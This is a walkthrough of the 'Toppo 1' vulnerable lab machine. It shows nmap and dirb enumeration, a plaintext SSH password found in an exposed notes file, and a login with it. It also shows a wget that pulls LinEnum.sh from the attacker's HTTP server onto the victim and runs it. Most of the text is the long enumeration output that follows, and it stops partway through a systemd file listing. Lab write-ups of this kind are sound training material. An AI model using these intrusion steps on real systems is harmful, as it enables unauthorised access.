# Toppo 1 ## Enumeration ### nmap ``` nmap -sC -sV -oA nmap/Toppo 192.168.43.243 ``` ``` Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-17 03:45 EDT Nmap scan report for Toppo (192.168.43.243) Host is up (0.00076s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0) | ssh-hostkey: | 1024 ec:61:97:9f:4d:cb:75:99:59:d4:c1:c4:d4:3e:d9:dc (DSA) | 2048 89:99:c4:54:9a:18:66:f7:cd:8e:ab:b6:aa:31:2e:c6 (RSA) | 256 60:be:dd:8f:1a:d7:a3:f3:fe:21:cc:2f:11:30:7b:0d (ECDSA) |_ 256 39:d9:79:26:60:3d:6c:a2:1e:8b:19:71:c0:e2:5e:5f (ED25519) 80/tcp open http Apache httpd 2.4.10 ((Debian)) |_http-server-header: Apache/2.4.10 (Debian) |_http-title: Clean Blog - Start Bootstrap Theme 111/tcp open rpcbind 2-4 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2,3,4 111/tcp rpcbind | 100000 2,3,4 111/udp rpcbind | 100000 3,4 111/tcp6 rpcbind | 100000 3,4 111/udp6 rpcbind | 100024 1 53154/udp status | 100024 1 53934/udp6 status | 100024 1 58497/tcp status |_ 100024 1 59067/tcp6 status MAC Address: 00:0C:29:D9:A7:6B (VMware) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 7.88 seconds ``` After we put the IP to the web browser, we got this ![](/files/-M7WxBtvcFDonaxdKRYH) Nothing seems to be interesting so I went to `dirb` ### dirb ``` ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Sun May 17 05:28:05 2020 URL_BASE: http://192.168.43.243/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://192.168.43.243/ ---- ==> DIRECTORY: http://192.168.43.243/admin/ ==> DIRECTORY: http://192.168.43.243/css/ ==> DIRECTORY: http://192.168.43.243/img/ + http://192.168.43.243/index.html (CODE:200|SIZE:6437) ==> DIRECTORY: http://192.168.43.243/js/ + http://192.168.43.243/LICENSE (CODE:200|SIZE:1093) ==> DIRECTORY: http://192.168.43.243/mail/ ==> DIRECTORY: http://192.168.43.243/manual/ + http://192.168.43.243/server-status (CODE:403|SIZE:302) ==> DIRECTORY: http://192.168.43.243/vendor/ ``` As we can see here there is a `admin` that might have some interesting stuffs inside, let's take a look into it. ![](/files/-M7WxpHpIUD5l5zAtpm8) Got this and when we click into the `notes.txt` ![](/files/-M7WxxNcIOCoc6t6BjY3) We got the password for the ssh! ### ssh From the password, I guess the username is `ted` and the password is `12345ted123`, then we ssh into the user ![](/files/-M7WyEo1gNbpw6QfszGK) We manage to login! ## Exploitation ### LinEnum.sh I use this script to enumerate the machine. By using the python -m SimpleHTTPServer, we can transfer files from our machine to victim's machine Our Machine: ![](/files/-M7WymSCnNm46FghdZUJ) Victim's Machine: ``` wget 192.168.43.182:8000/LinEnum.sh ``` ![](/files/-M7Wyy94YhT-UG7cbUe0) After that, `chmod +x LinEnum.sh` to make it executable run by typing `./LinEnum.sh` ``` -rwxr-xr-x 1 root root 4125 Feb 10 2018 exim4-base -rwxr-xr-x 1 root root 89 Nov 8 2014 logrotate -rwxr-xr-x 1 root root 1293 Dec 31 2014 man-db -rwxr-xr-x 1 root root 435 Jun 13 2013 mlocate -rwxr-xr-x 1 root root 249 May 17 2017 passwd -rw-r--r-- 1 root root 102 Jun 7 2015 .placeholder /etc/cron.hourly: total 12 drwxr-xr-x 2 root root 4096 Apr 15 2018 . drwxr-xr-x 90 root root 4096 May 17 04:21 .. -rw-r--r-- 1 root root 102 Jun 7 2015 .placeholder /etc/cron.monthly: total 16 drwxr-xr-x 2 root root 4096 Apr 15 2018 . drwxr-xr-x 90 root root 4096 May 17 04:21 .. -rwxr-xr-x 1 root root 313 Dec 28 2014 0anacron -rw-r--r-- 1 root root 102 Jun 7 2015 .placeholder /etc/cron.weekly: total 20 drwxr-xr-x 2 root root 4096 Apr 15 2018 . drwxr-xr-x 90 root root 4096 May 17 04:21 .. -rwxr-xr-x 1 root root 312 Dec 28 2014 0anacron -rwxr-xr-x 1 root root 771 Dec 31 2014 man-db -rw-r--r-- 1 root root 102 Jun 7 2015 .placeholder [-] Crontab contents: # /etc/crontab: system-wide crontab # Unlike any other crontab you don't have to run the `crontab' # command to install the new version when you edit this file # and files in /etc/cron.d. These files also have username fields, # that none of the other crontabs do. SHELL=/bin/sh PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin # m h dom mon dow user command 17 * * * * root cd / && run-parts --report /etc/cron.hourly 25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily ) 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly ) 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly ) # [-] Anacron jobs and associated file permissions: -rw-r--r-- 1 root root 401 Dec 28 2014 /etc/anacrontab # /etc/anacrontab: configuration file for anacron # See anacron(8) and anacrontab(5) for details. SHELL=/bin/sh PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin HOME=/root LOGNAME=root # These replace cron's entries 1 5 cron.daily run-parts --report /etc/cron.daily 7 10 cron.weekly run-parts --report /etc/cron.weekly @monthly 15 cron.monthly run-parts --report /etc/cron.monthly [-] When were jobs last executed (/var/spool/anacron contents): total 20 drwxr-xr-x 2 root root 4096 Apr 15 2018 . drwxr-xr-x 6 root root 4096 Apr 15 2018 .. -rw------- 1 root root 9 May 17 02:47 cron.daily -rw------- 1 root root 9 May 17 02:57 cron.monthly -rw------- 1 root root 9 May 17 02:52 cron.weekly [-] Systemd timers: NEXT LEFT LAST PASSED UNIT ACTIVATES Mon 2020-05-18 02:57:05 CDT 22h left Sun 2020-05-17 02:57:05 CDT 1h 38min ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service 1 timers listed. Enable thorough tests to see inactive timers ### NETWORKING ########################################## [-] Network and IP info: eth0 Link encap:Ethernet HWaddr 00:0c:29:d9:a7:6b inet addr:192.168.43.243 Bcast:192.168.43.255 Mask:255.255.255.0 inet6 addr: fe80::20c:29ff:fed9:a76b/64 Scope:Link inet6 addr: 2001:d08:1013:1e84:20c:29ff:fed9:a76b/64 Scope:Global UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:345209 errors:1 dropped:2 overruns:0 frame:0 TX packets:283797 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:46933742 (44.7 MiB) TX bytes:98213804 (93.6 MiB) Interrupt:19 Base address:0x2000 lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 inet6 addr: ::1/128 Scope:Host UP LOOPBACK RUNNING MTU:65536 Metric:1 RX packets:8 errors:0 dropped:0 overruns:0 frame:0 TX packets:8 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:792 (792.0 B) TX bytes:792 (792.0 B) [-] ARP history: fe80::16d1:69ff:fe52:5d6a dev eth0 lladdr 14:d1:69:52:5d:6a router STALE 192.168.43.67 dev eth0 lladdr 00:0c:29:20:b4:b1 STALE 192.168.43.182 dev eth0 lladdr 00:0c:29:20:b4:b1 REACHABLE 192.168.43.1 dev eth0 lladdr 14:d1:69:52:5d:6a STALE [-] Nameserver(s): nameserver 192.168.43.1 [-] Default route: default via 192.168.43.1 dev eth0 [-] Listening TCP: Active Internet connections (only servers) Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:58497 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN - tcp6 0 0 ::1:25 :::* LISTEN - tcp6 0 0 :::59067 :::* LISTEN - tcp6 0 0 :::111 :::* LISTEN - tcp6 0 0 :::80 :::* LISTEN - tcp6 0 0 :::22 :::* LISTEN - [-] Listening UDP: Active Internet connections (only servers) Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name udp 0 0 0.0.0.0:20820 0.0.0.0:* - udp 0 0 0.0.0.0:53154 0.0.0.0:* - udp 0 0 0.0.0.0:995 0.0.0.0:* - udp 0 0 127.0.0.1:1006 0.0.0.0:* - udp 0 0 0.0.0.0:68 0.0.0.0:* - udp 0 0 0.0.0.0:111 0.0.0.0:* - udp6 0 0 :::53934 :::* - udp6 0 0 :::35695 :::* - udp6 0 0 :::995 :::* - udp6 0 0 :::111 :::* - ### SERVICES ############################################# [-] Running processes: USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND root 1 0.0 0.1 22808 4040 ? Ss 02:42 0:01 /sbin/init root 2 0.0 0.0 0 0 ? S 02:42 0:00 [kthreadd] root 3 0.0 0.0 0 0 ? S 02:42 0:01 [ksoftirqd/0] root 5 0.0 0.0 0 0 ? S< 02:42 0:00 [kworker/0:0H] root 6 0.0 0.0 0 0 ? S 02:42 0:00 [kworker/u2:0] root 7 0.0 0.0 0 0 ? S 02:42 0:00 [watchdog/0] root 8 0.0 0.0 0 0 ? S< 02:42 0:00 [khelper] root 9 0.0 0.0 0 0 ? S 02:42 0:00 [kdevtmpfs] root 10 0.0 0.0 0 0 ? S< 02:42 0:00 [netns] root 11 0.0 0.0 0 0 ? S 02:42 0:00 [khungtaskd] root 12 0.0 0.0 0 0 ? S< 02:42 0:00 [writeback] root 13 0.0 0.0 0 0 ? SN 02:42 0:00 [ksmd] root 14 0.0 0.0 0 0 ? S< 02:42 0:00 [crypto] root 15 0.0 0.0 0 0 ? S< 02:42 0:00 [kintegrityd] root 16 0.0 0.0 0 0 ? S< 02:42 0:00 [bioset] root 17 0.0 0.0 0 0 ? S< 02:42 0:00 [kblockd] root 19 0.0 0.0 0 0 ? S 02:42 0:00 [kswapd0] root 20 0.0 0.0 0 0 ? S 02:42 0:00 [fsnotify_mark] root 26 0.0 0.0 0 0 ? S< 02:42 0:00 [kthrotld] root 27 0.0 0.0 0 0 ? S< 02:42 0:00 [ipv6_addrconf] root 28 0.0 0.0 0 0 ? S< 02:42 0:00 [deferwq] root 63 0.0 0.0 0 0 ? S< 02:42 0:00 [ata_sff] root 64 0.0 0.0 0 0 ? S< 02:42 0:00 [mpt_poll_0] root 65 0.0 0.0 0 0 ? S 02:42 0:00 [khubd] root 66 0.0 0.0 0 0 ? S< 02:42 0:00 [mpt/0] root 67 0.0 0.0 0 0 ? S< 02:42 0:00 [kpsmoused] root 69 0.0 0.0 0 0 ? S 02:42 0:00 [scsi_eh_0] root 70 0.0 0.0 0 0 ? S< 02:42 0:00 [scsi_tmf_0] root 71 0.0 0.0 0 0 ? S 02:42 0:00 [scsi_eh_1] root 72 0.0 0.0 0 0 ? S 02:42 0:00 [kworker/u2:2] root 74 0.0 0.0 0 0 ? S< 02:42 0:00 [scsi_tmf_1] root 75 0.0 0.0 0 0 ? S 02:42 0:00 [scsi_eh_2] root 76 0.0 0.0 0 0 ? S< 02:42 0:00 [scsi_tmf_2] root 80 0.0 0.0 0 0 ? S< 02:42 0:00 [kworker/0:1H] root 101 0.0 0.0 0 0 ? S 02:42 0:00 [jbd2/sda1-8] root 102 0.0 0.0 0 0 ? S< 02:42 0:00 [ext4-rsv-conver] root 133 0.0 0.0 0 0 ? S 02:42 0:00 [kauditd] root 138 0.0 0.2 9376 4644 ? Ss 02:42 0:05 /lib/systemd/systemd-journald root 142 0.0 0.1 12484 3304 ? Ss 02:42 0:00 /lib/systemd/systemd-udevd root 178 0.0 0.0 0 0 ? S< 02:42 0:00 [ttm_swap] root 183 0.0 0.0 0 0 ? S< 02:42 0:00 [kworker/u3:0] root 186 0.0 0.0 0 0 ? S< 02:42 0:00 [hci0] root 187 0.0 0.0 0 0 ? S< 02:42 0:00 [hci0] root 220 0.0 0.0 0 0 ? S< 02:42 0:00 [kworker/u3:2] root 396 0.0 0.1 4444 2832 ? Ss 02:42 0:00 /sbin/rpcbind -w statd 406 0.0 0.1 4620 2904 ? Ss 02:42 0:00 /sbin/rpc.statd root 415 0.0 0.0 0 0 ? S< 02:42 0:00 [rpciod] root 417 0.0 0.0 0 0 ? S< 02:42 0:00 [nfsiod] root 424 0.0 0.0 2920 1608 ? Ss 02:42 0:00 /usr/sbin/rpc.idmapd root 425 0.0 0.1 5412 3532 ? Ss 02:42 0:00 /usr/lib/bluetooth/bluetoothd root 427 0.0 0.1 5012 2784 ? Ss 02:42 0:00 /usr/sbin/cron -f daemon 428 0.0 0.0 2648 1892 ? Ss 02:42 0:00 /usr/sbin/atd -f root 431 0.0 0.1 3528 2452 ? Ss 02:42 0:00 /lib/systemd/systemd-logind message+ 434 0.0 0.1 5348 3400 ? Ss 02:42 0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation root 444 0.0 0.1 31096 3536 ? Ssl 02:42 0:01 /usr/sbin/rsyslogd -n root 446 0.0 0.0 2196 1600 ? Ss 02:42 0:00 /usr/sbin/acpid root 449 0.0 0.0 4176 2056 tty1 Ss+ 02:42 0:00 /sbin/agetty --noclear tty1 linux root 490 0.0 0.2 8108 4812 ? Ss 02:42 0:02 /usr/sbin/sshd -D root 571 0.0 0.9 94272 20588 ? Ss 02:42 0:00 /usr/sbin/apache2 -k start Debian-+ 728 0.0 0.1 9936 2980 ? Ss 02:42 0:00 /usr/sbin/exim4 -bd -q30m root 749 0.0 0.3 9248 6780 ? Ss 02:42 0:00 dhclient -v -pf /run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases eth0 www-data 966 0.0 0.3 94744 7712 ? S 02:47 0:05 /usr/sbin/apache2 -k start www-data 967 0.0 0.3 94736 7680 ? S 02:47 0:05 /usr/sbin/apache2 -k start www-data 968 0.0 0.3 94736 7600 ? S 02:47 0:05 /usr/sbin/apache2 -k start www-data 969 0.0 0.3 94736 7672 ? S 02:47 0:05 /usr/sbin/apache2 -k start www-data 970 0.0 0.5 94728 11164 ? S 02:47 0:05 /usr/sbin/apache2 -k start www-data 1221 0.0 0.3 94736 7504 ? S 02:47 0:05 /usr/sbin/apache2 -k start www-data 1223 0.0 0.3 94720 7596 ? S 02:47 0:05 /usr/sbin/apache2 -k start www-data 1224 0.0 0.3 94736 7532 ? S 02:47 0:05 /usr/sbin/apache2 -k start www-data 1225 0.0 0.5 94736 11084 ? S 02:47 0:05 /usr/sbin/apache2 -k start www-data 1226 0.0 0.4 94736 10320 ? S 02:47 0:05 /usr/sbin/apache2 -k start ted 7567 0.0 0.0 2920 1504 ? Ss 04:00 0:00 /usr/sbin/rpc.idmapd root 8651 0.0 0.0 0 0 ? S 04:22 0:00 [kworker/0:1] root 8669 0.0 0.0 0 0 ? S 04:27 0:00 [kworker/0:2] root 8670 0.0 0.2 11120 5404 ? Ss 04:30 0:00 sshd: ted [priv] ted 8672 0.0 0.2 11120 4440 ? S 04:30 0:00 sshd: ted@pts/0 ted 8673 0.0 0.2 6396 4564 pts/0 Ss 04:30 0:00 -bash root 8683 0.0 0.0 0 0 ? S 04:32 0:00 [kworker/0:0] ted 8696 0.0 0.1 5844 3756 pts/0 S+ 04:35 0:00 /bin/bash ./LinEnum.sh ted 8697 0.0 0.1 5880 3344 pts/0 S+ 04:35 0:00 /bin/bash ./LinEnum.sh ted 8698 0.0 0.0 3748 1616 pts/0 S+ 04:35 0:00 tee -a ted 8878 0.0 0.1 5880 2620 pts/0 S+ 04:35 0:00 /bin/bash ./LinEnum.sh ted 8879 0.0 0.1 4772 2468 pts/0 R+ 04:35 0:00 ps aux [-] Process binaries and associated permissions (from above list): 1.1M -rwxr-xr-x 1 root root 1.1M Nov 5 2016 /bin/bash 260K -rwxr-xr-x 1 root root 258K Apr 8 2017 /lib/systemd/systemd-journald 528K -rwxr-xr-x 1 root root 526K Apr 8 2017 /lib/systemd/systemd-logind 296K -rwxr-xr-x 1 root root 294K Apr 8 2017 /lib/systemd/systemd-udevd 36K -rwxr-xr-x 1 root root 34K Mar 29 2015 /sbin/agetty 0 lrwxrwxrwx 1 root root 20 Apr 8 2017 /sbin/init -> /lib/systemd/systemd 48K -rwxr-xr-x 1 root root 46K May 4 2017 /sbin/rpcbind 76K -rwxr-xr-x 1 root root 75K Aug 13 2014 /sbin/rpc.statd 508K -rwxr-xr-x 1 root root 507K Nov 21 2016 /usr/bin/dbus-daemon 1.1M -rwxr-xr-x 1 root root 1.1M Sep 13 2017 /usr/lib/bluetooth/bluetoothd 52K -rwxr-xr-x 1 root root 50K Nov 8 2014 /usr/sbin/acpid 628K -rwxr-xr-x 1 root root 628K Mar 31 2018 /usr/sbin/apache2 24K -rwxr-xr-x 1 root root 22K Sep 30 2014 /usr/sbin/atd 44K -rwxr-xr-x 1 root root 43K Jun 7 2015 /usr/sbin/cron 1.1M -rwsr-xr-x 1 root root 1.1M Feb 10 2018 /usr/sbin/exim4 32K -rwxr-xr-x 1 root root 31K Aug 13 2014 /usr/sbin/rpc.idmapd 640K -rwxr-xr-x 1 root root 638K Dec 20 2015 /usr/sbin/rsyslogd 932K -rwxr-xr-x 1 root root 931K Nov 19 2017 /usr/sbin/sshd [-] /etc/init.d/ binary permissions: total 256 drwxr-xr-x 2 root root 4096 Apr 15 2018 . drwxr-xr-x 90 root root 4096 May 17 04:21 .. -rwxr-xr-x 1 root root 2243 Nov 8 2014 acpid -rwxr-xr-x 1 root root 2014 Dec 28 2014 anacron -rwxr-xr-x 1 root root 10192 Apr 15 2018 apache2 -rwxr-xr-x 1 root root 1071 Sep 30 2014 atd -rwxr-xr-x 1 root root 2948 Sep 13 2017 bluetooth -rwxr-xr-x 1 root root 1276 Apr 6 2015 bootlogs -rwxr-xr-x 1 root root 1248 Apr 6 2015 bootmisc.sh -rwxr-xr-x 1 root root 3807 Apr 6 2015 checkfs.sh -rwxr-xr-x 1 root root 1072 Apr 6 2015 checkroot-bootclean.sh -rwxr-xr-x 1 root root 9290 Apr 6 2015 checkroot.sh -rwxr-xr-x 1 root root 1379 Dec 8 2011 console-setup -rwxr-xr-x 1 root root 3049 Oct 23 2014 cron -rwxr-xr-x 1 root root 2813 Oct 10 2016 dbus -rw-r--r-- 1 root root 1468 Apr 15 2018 .depend.boot -rw-r--r-- 1 root root 497 Apr 15 2018 .depend.start -rw-r--r-- 1 root root 567 Apr 15 2018 .depend.stop -rwxr-xr-x 1 root root 6606 Feb 10 2018 exim4 -rwxr-xr-x 1 root root 1336 Apr 6 2015 halt -rwxr-xr-x 1 root root 1423 Apr 6 2015 hostname.sh -rwxr-xr-x 1 root root 3916 Mar 29 2015 hwclock.sh -rwxr-xr-x 1 root root 8189 Oct 25 2014 kbd -rwxr-xr-x 1 root root 1591 Sep 30 2012 keyboard-setup -rwxr-xr-x 1 root root 1300 Apr 6 2015 killprocs -rwxr-xr-x 1 root root 1990 Sep 23 2014 kmod -rwxr-xr-x 1 root root 995 Apr 6 2015 motd -rwxr-xr-x 1 root root 677 Apr 6 2015 mountall-bootclean.sh -rwxr-xr-x 1 root root 2138 Apr 6 2015 mountall.sh -rwxr-xr-x 1 root root 1461 Apr 6 2015 mountdevsubfs.sh -rwxr-xr-x 1 root root 1564 Apr 6 2015 mountkernfs.sh -rwxr-xr-x 1 root root 685 Apr 6 2015 mountnfs-bootclean.sh -rwxr-xr-x 1 root root 2456 Apr 6 2015 mountnfs.sh -rwxr-xr-x 1 root root 4760 Dec 14 2014 networking -rwxr-xr-x 1 root root 5658 Aug 12 2014 nfs-common -rwxr-xr-x 1 root root 1192 Mar 6 2015 procps -rwxr-xr-x 1 root root 6228 Apr 6 2015 rc -rwxr-xr-x 1 root root 820 Apr 6 2015 rc.local -rwxr-xr-x 1 root root 117 Apr 6 2015 rcS -rw-r--r-- 1 root root 2427 Apr 6 2015 README -rwxr-xr-x 1 root root 661 Apr 6 2015 reboot -rwxr-xr-x 1 root root 1042 Apr 6 2015 rmnologin -rwxr-xr-x 1 root root 2512 Sep 20 2015 rpcbind -rwxr-xr-x 1 root root 2796 Dec 14 2015 rsyslog -rwxr-xr-x 1 root root 3207 Apr 6 2015 sendsigs -rwxr-xr-x 1 root root 597 Apr 6 2015 single -rw-r--r-- 1 root root 1087 Apr 6 2015 skeleton -rwxr-xr-x 1 root root 4077 Nov 18 2017 ssh -rwxr-xr-x 1 root root 6581 Mar 9 2017 udev -rwxr-xr-x 1 root root 461 Mar 9 2017 udev-finish -rwxr-xr-x 1 root root 2737 Apr 6 2015 umountfs -rwxr-xr-x 1 root root 2202 Apr 6 2015 umountnfs.sh -rwxr-xr-x 1 root root 1129 Apr 6 2015 umountroot -rwxr-xr-x 1 root root 3111 Apr 6 2015 urandom [-] /etc/init/ config file permissions: total 68 drwxr-xr-x 2 root root 4096 Apr 15 2018 . drwxr-xr-x 90 root root 4096 May 17 04:21 .. -rw-r--r-- 1 root root 278 Dec 28 2014 anacron.conf -rw-r--r-- 1 root root 2493 Jun 3 2014 networking.conf -rw-r--r-- 1 root root 933 Jun 3 2014 network-interface.conf -rw-r--r-- 1 root root 530 Jun 3 2014 network-interface-container.conf -rw-r--r-- 1 root root 1756 May 4 2013 network-interface-security.conf -rw-r--r-- 1 root root 815 Sep 20 2015 portmap-wait.conf -rw-r--r-- 1 root root 209 Sep 20 2015 rpcbind-boot.conf -rw-r--r-- 1 root root 1042 Sep 20 2015 rpcbind.conf -rw-r--r-- 1 root root 641 Nov 18 2017 ssh.conf -rw-r--r-- 1 root root 581 Apr 10 2014 startpar-bridge.conf -rw-r--r-- 1 root root 337 Mar 9 2017 udev.conf -rw-r--r-- 1 root root 637 Mar 9 2017 udev-fallback-graphics.conf -rw-r--r-- 1 root root 643 Mar 9 2017 udev-finish.conf -rw-r--r-- 1 root root 356 Mar 9 2017 udevmonitor.conf -rw-r--r-- 1 root root 352 Mar 9 2017 udevtrigger.conf [-] /lib/systemd/* config file permissions: /lib/systemd/: total 6.6M drwxr-xr-x 20 root root 36K Apr 15 2018 system drwxr-xr-x 2 root root 4.0K Apr 15 2018 network drwxr-xr-x 2 root root 4.0K Apr 15 2018 system-generators drwxr-xr-x 2 root root 4.0K Apr 15 2018 system-preset -rwxr-xr-x 1 root root 294K Apr 8 2017 systemd-udevd -rwxr-xr-x 1 root root 46K Apr 8 2017 systemd-activate -rwxr-xr-x 1 root root 82K Apr 8 2017 systemd-bootchart -rwxr-xr-x 1 root root 66K Apr 8 2017 systemd-cryptsetup -rwxr-xr-x 1 root root 262K Apr 8 2017 systemd-fsck -rwxr-xr-x 1 root root 298K Apr 8 2017 systemd-hostnamed -rwxr-xr-x 1 root root 258K Apr 8 2017 systemd-journald -rwxr-xr-x 1 root root 306K Apr 8 2017 systemd-localed -rwxr-xr-x 1 root root 34K Apr 8 2017 systemd-remount-fs -rwxr-xr-x 1 root root 26K Apr 8 2017 systemd-reply-password -rwxr-xr-x 1 root root 42K Apr 8 2017 systemd-rfkill -rwxr-xr-x 1 root root 1.3M Apr 8 2017 systemd -rwxr-xr-x 1 root root 54K Apr 8 2017 systemd-backlight -rwxr-xr-x 1 root root 298K Apr 8 2017 systemd-bus-proxyd -rwxr-xr-x 1 root root 238K Apr 8 2017 systemd-cgroups-agent -rwxr-xr-x 1 root root 526K Apr 8 2017 systemd-logind -rwxr-xr-x 1 root root 42K Apr 8 2017 systemd-modules-load -rwxr-xr-x 1 root root 14K Apr 8 2017 systemd-multi-seat-x -rwxr-xr-x 1 root root 74K Apr 8 2017 systemd-networkd-wait-online -rwxr-xr-x 1 root root 26K Apr 8 2017 systemd-random-seed -rwxr-xr-x 1 root root 78K Apr 8 2017 systemd-socket-proxyd -rwxr-xr-x 1 root root 22K Apr 8 2017 systemd-user-sessions -rwxr-xr-x 1 root root 34K Apr 8 2017 systemd-binfmt -rwxr-xr-x 1 root root 246K Apr 8 2017 systemd-initctl -rwxr-xr-x 1 root root 330K Apr 8 2017 systemd-machined -rwxr-xr-x 1 root root 546K Apr 8 2017 systemd-networkd -rwxr-xr-x 1 root root 74K Apr 8 2017 systemd-readahead -rwxr-xr-x 1 root root 78K Apr 8 2017 systemd-resolved -rwxr-xr-x 1 root root 38K Apr 8 2017 systemd-shutdownd -rwxr-xr-x 1 root root 310K Apr 8 2017 systemd-timedated -rwxr-xr-x 1 root root 110K Apr 8 2017 systemd-timesyncd -rwxr-xr-x 1 root root 242K Apr 8 2017 systemd-update-utmp -rwxr-xr-x 1 root root 9.4K Apr 8 2017 systemd-ac-power -rwxr-xr-x 1 root root 30K Apr 8 2017 systemd-quotacheck -rwxr-xr-x 1 root root 90K Apr 8 2017 systemd-shutdown -rwxr-xr-x 1 root root 50K Apr 8 2017 systemd-sleep -rwxr-xr-x 1 root root 38K Apr 8 2017 systemd-sysctl -rwxr-xr-x 1 root root 546 Apr 8 2017 debian-fixup -rwxr-xr-x 1 root root 462 Apr 8 2017 systemd-logind-launch drwxr-xr-x 2 root root 4.0K Apr 8 2017 system-shutdown drwxr-xr-x 2 root root 4.0K Apr 8 2017 system-sleep /lib/systemd/system: total 688K drwxr-xr-x 2 root root 4.0K Apr 15 2018 dbus.target.wants drwxr-xr-x 2 root root 4.0K Apr 15 2018 multi-user.target.wants drwxr-xr-x 2 root root 4.0K Apr 15 2018 sockets.target.wants drwxr-xr-x 2 root root 4.0K Apr 15 2018 apache2.service.d drwxr-xr-x 2 root root 4.0K Apr 15 2018 getty.target.wants drwxr-xr-x 2 root root 4.0K Apr 15 2018 graphical.target.wants drwxr-xr-x 2 root root 4.0K Apr 15 2018 local-fs.target.wants drwxr-xr-x 2 root root 4.0K Apr 15 2018 poweroff.target.wants drwxr-xr-x 2 root root 4.0K Apr 15 2018 reboot.target.wants drwxr-xr-x 2 root root 4.0K Apr 15 2018 rescue.target.wants drwxr-xr-x 2 root root 4.0K Apr 15 2018 runlevel1.target.wants drwxr-xr-x 2 root root 4.0K Apr 15 2018 runlevel2.target.wants drwxr-xr-x 2 root root 4.0K Apr 15 2018 runlevel3.target.wants drwxr-xr-x 2 root root 4.0K Apr 15 2018 runlevel4.target.wants drwxr-xr-x 2 root root 4.0K Apr 15 2018 runlevel5.target.wants drwxr-xr-x 2 root root 4.0K Apr 15 2018 sysinit.target.wants drwxr-xr-x 2 root root 4.0K Apr 15 2018 timers.target.wants drwxr-xr-x 2 root root 4.0K Apr 15 2018 networking.service.d -rw-r--r-- 1 root root 404 Nov 18 2017 ssh.service -rw-r--r-- 1 root root 196 Nov 18 2017 ssh@.service -rw-r--r-- 1 root root 216 Nov 18 2017 ssh.socket -rw-r--r-- 1 root root 244 Oct 14 2017 wpa_supplicant.service -rw-r--r-- 1 root root 338 Sep 13 2017 bluetooth.service lrwxrwxrwx 1 root root 21 Apr 8 2017 udev.service -> systemd-udevd.service lrwxrwxrwx 1 root root 14 Apr 8 2017 autovt@.service -> getty@.service lrwxrwxrwx 1 root root 9 Apr 8 2017 bootlogd.service -> /dev/null lrwxrwxrwx 1 root root 9 Apr 8 2017 bootlogs.service -> /dev/null lrwxrwxrwx 1 root root 9 Apr 8 2017 bootmisc.service -> /dev/null lrwxrwxrwx 1 root root 9 Apr 8 2017 checkfs.service -> /dev/null lrwxrwxrwx 1 root root 9 Apr 8 2017 checkroot-bootclean.service -> /dev/null lrwxrwxrwx 1 root root 9 Apr 8 2017 checkroot.service -> /dev/null lrwxrwxrwx 1 root root 9 Apr 8 2017 cryptdisks-early.service -> /dev/null lrwxrwxrwx 1 root root 9 Apr 8 2017 cryptdisks.service -> /dev/null lrwxrwxrwx 1 root root 13 Apr 8 2017 ctrl-alt-del.target -> reboot.target lrwxrwxrwx 1 root root 25 Apr 8 2017 dbus-org.freedesktop.hostname1.service -> systemd-hostnamed.service lrwxrwxrwx 1 root root 23 Apr 8 2017 dbus-org.freedesktop.locale1.service -> systemd-localed.service lrwxrwxrwx 1 root root 22 Apr 8 2017 dbus-org.freedesktop.login1.service -> systemd-logind.service lrwxrwxrwx 1 root root 24 Apr 8 2017 dbus-org.freedesktop.machine1.service -> systemd-machined.service lrwxrwxrwx 1 root root 25 Apr 8 2017 dbus-org.freedesktop.timedate1.service -> systemd-timedated.service lrwxrwxrwx 1 root root 16 Apr 8 2017 default.target -> graphical.target lrwxrwxrwx 1 root root 9 Apr 8 2017 fuse.service -> /dev/null lrwxrwxrwx 1 root root 9 Apr 8 2017 halt.service -> /dev/null lrwxrwxrwx 1 root root 9 Apr 8 2017 hostname.service -> /dev/null lrwxrwxrwx 1 root root 9 Apr 8 2017 hwclockfirst.service -> /dev/null lrwxrwxrwx 1 root root 9 Apr 8 2017 hwclock.service -> /dev/null lrwxrwxrwx 1 root root 9 Apr 8 2017 killprocs.service -> /dev/null lrwxrwxrwx 1 root root 28 Apr 8 2017 kmod.service -> systemd-modules-load.service lrwxrwxrwx 1 root root 28 Apr 8 2017 module-init-tools.service -> systemd-modules-load.service lrwxrwxrwx 1 root root 9 Apr 8 2017 motd.service -> /dev/null lrwxrwxrwx 1 root root 9 Apr 8 2017 mountall-bootclean.service -> /dev/null lrwxrwxrwx 1 root root 9 Apr 8 2017 mountall.service -> /dev/null lrwxrwxrwx 1 root root 9 Apr 8 2017 mountdevsubfs.service -> /dev/null lrwxrwxrwx 1 root root 9 Apr 8 2017 mountkernfs.service -> /dev/null lrwxrwxrwx 1 root root 9 Apr 8 2017 mountnfs-bootclean.service -> /dev/null lrwxrwxrwx 1 root root 9 Apr 8 2017 mountnfs.service -> /dev/null 